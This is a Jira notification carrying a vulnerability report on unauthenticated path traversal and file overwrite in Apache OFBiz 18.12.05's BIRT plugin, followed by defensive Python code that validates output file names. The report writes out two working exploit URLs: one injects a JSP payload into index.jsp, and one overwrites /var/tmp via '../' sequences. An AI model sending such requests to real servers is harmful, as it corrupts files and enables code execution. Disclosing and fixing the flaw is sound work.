[ https://issues.apache.org/jira/browse/OFBIZ-12577?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ]

Jacques Le Roux updated OFBIZ-12577:
------------------------------------
    Summary: Pending issue  (was: Unauth Path Traversal with file corruption)

> Pending issue
> -------------
>
>                 Key: OFBIZ-12577
>                 URL: https://issues.apache.org/jira/browse/OFBIZ-12577
>             Project: OFBiz
>          Issue Type: Bug
>    Affects Versions: 18.12.05
>            Reporter: Nikita Podotykin
>            Priority: Major
>             Fix For: 18.12.05
>
>   Original Estimate: 72h
>  Remaining Estimate: 72h
>
> *Description of the vulnerability*
> *Unauth Path Traversal with file corruption*
> After reading a note (https://bugs.eclipse.org/bugs/show_bug.cgi?id=538142) 
> about a remote code execution (RCE) vulnerability in Birt, there was an 
> attempt to reproduce it. 
> https://192.168.0.13:8443/birt/output?__report=./../ordermgr/reports/SalesReport.rptdesign&__format=pdf&__overwrite=true&__document=index.jsp&reportBy=%3C%25%0A%20%20out.println(%22OS%3A%20%22%20%2B%20System.getProperty(%22os.name%22))%3B%0A%20%20out.println(%22Current%20dir%3A%20%22%20%2B%20getServletContext().getRealPath(%22%2F%22))%3B%0A%25%3E%0A
> I rewrote the system index.jsp file 
> (~/apache-ofbiz-18.12.05/plugins/birt/webapp/index.jsp), 
> corrupting it, but the payload didn't work. Before and after making a request 
> from an unauthorized user:
> !image-2022-02-21-15-54-00-257.png!
> When accessing the script, the index server returns a 500 error.
> !image-2022-02-21-15-54-51-612.png!
> An unauthorized user can overwrite and corrupt files in the current folder. 
> Can it go beyond 
> the current folder and overwrite, for example, file /var/tmp/s3cReTfIle? - 
> yes!
> https://192.168.0.13:8443/birt/output?__report=./../ordermgr/reports/SalesReport.rptdesign&__format=pdf&__overwrite=true&__document=../../../../../../../../var/tmp/s3cReTfIle&reportBy=test
> !image-2022-02-21-16-00-25-840.png!
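The report above hinges on two things: the client controls the output file name (`__document`) and can ask for an existing file to be replaced (`__overwrite=true`), with no check that the resulting path stays inside the report output directory. The following is an added, self-contained example of the server-side policy that closes that gap; it is not OFBiz or BIRT code and does not use their APIs. The format names, the `resolve_output_path`/`write_report` helpers, and the temporary directory standing in for the report output folder are all assumptions made for the demonstration.

```python
import re
import tempfile
from pathlib import Path, PurePosixPath

# Constructed policy values (assumed, not taken from OFBiz/BIRT).
ALLOWED_FORMATS = {"pdf", "html", "xlsx"}
# A bare file name: no separators, no leading dot, so '.', '..' and
# hidden files are excluded before any path arithmetic happens.
SAFE_NAME = re.compile(r"^[A-Za-z0-9_][A-Za-z0-9_.-]*$")


class UnsafeDocumentName(ValueError):
    """Raised when a requested output name would leave the report directory."""


def resolve_output_path(output_dir: Path, document: str, fmt: str) -> Path:
    """Map a client-supplied document name to a path strictly inside output_dir.

    Three independent checks, so that slipping past one does not reach the disk:
    1. the format must be one the server is willing to emit;
    2. the name must be a plain file name whose extension matches that format,
       so a 'pdf' export can never produce index.jsp or any other script;
    3. after canonicalisation (symlinks resolved) the file must still be a
       direct child of the canonical output directory.
    """
    if fmt not in ALLOWED_FORMATS:
        raise UnsafeDocumentName(f"unsupported format: {fmt!r}")

    # PurePosixPath.name drops any directory part; if that changes the string,
    # the client sent a path ('../..', '/var/tmp/x') rather than a file name.
    if PurePosixPath(document).name != document or not SAFE_NAME.match(document):
        raise UnsafeDocumentName(f"not a plain file name: {document!r}")

    if not document.lower().endswith("." + fmt):
        raise UnsafeDocumentName(f"extension does not match format: {document!r}")

    base = output_dir.resolve()
    candidate = (base / document).resolve()
    if candidate.parent != base:  # defence in depth; cannot fail after check 2
        raise UnsafeDocumentName(f"escapes output directory: {document!r}")
    return candidate


def write_report(output_dir: Path, document: str, fmt: str, data: bytes,
                 overwrite: bool = False) -> Path:
    """Write report bytes to a validated path.

    'overwrite' is a server-side policy decision (for example, only for the
    user who owns the report); it is never read from the request.
    """
    path = resolve_output_path(output_dir, document, fmt)
    mode = "wb" if overwrite else "xb"  # "xb" refuses to replace an existing file
    with open(path, mode) as fh:
        fh.write(data)
    return path


def evaluate_document_names(names, fmt: str = "pdf") -> dict:
    """Return {name: accepted?} using a throw-away directory as output_dir."""
    results = {}
    with tempfile.TemporaryDirectory() as tmp:
        out = Path(tmp)
        for name in names:
            try:
                resolve_output_path(out, name, fmt)
                results[name] = True
            except UnsafeDocumentName:
                results[name] = False
    return results


def demo_overwrite_policy() -> tuple:
    """Show that replacement only happens when the server decides so.

    Returns (second write without overwrite refused?, overwrite=True replaced?).
    """
    with tempfile.TemporaryDirectory() as tmp:
        out = Path(tmp)
        write_report(out, "SalesReport.pdf", "pdf", b"v1")
        try:
            write_report(out, "SalesReport.pdf", "pdf", b"v2")
            refused = False
        except FileExistsError:
            refused = True
        path = write_report(out, "SalesReport.pdf", "pdf", b"v2", overwrite=True)
        replaced = path.read_bytes() == b"v2"
    return refused, replaced


if __name__ == "__main__":
    # Constructed sample inputs modelled on the names in the report.
    samples = ["SalesReport.pdf", "index.jsp",
               "../../../../../../../../var/tmp/s3cReTfIle",
               "/var/tmp/s3cReTfIle", "..", "sub/report.pdf"]
    for name, ok in evaluate_document_names(samples).items():
        print(f"{'accept' if ok else 'reject':6s} {name}")
    print("overwrite policy (refused, replaced):", demo_overwrite_policy())
```

The design point is that the file name is validated as a name, not sanitised as a path: stripping `../` sequences from a string leaves room for encoding tricks, whereas requiring a separator-free name with a server-chosen extension, and then confirming the canonical parent directory, leaves nothing for the request to influence beyond the base name itself.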



--
This message was sent by Atlassian Jira
(v8.20.1#820001)
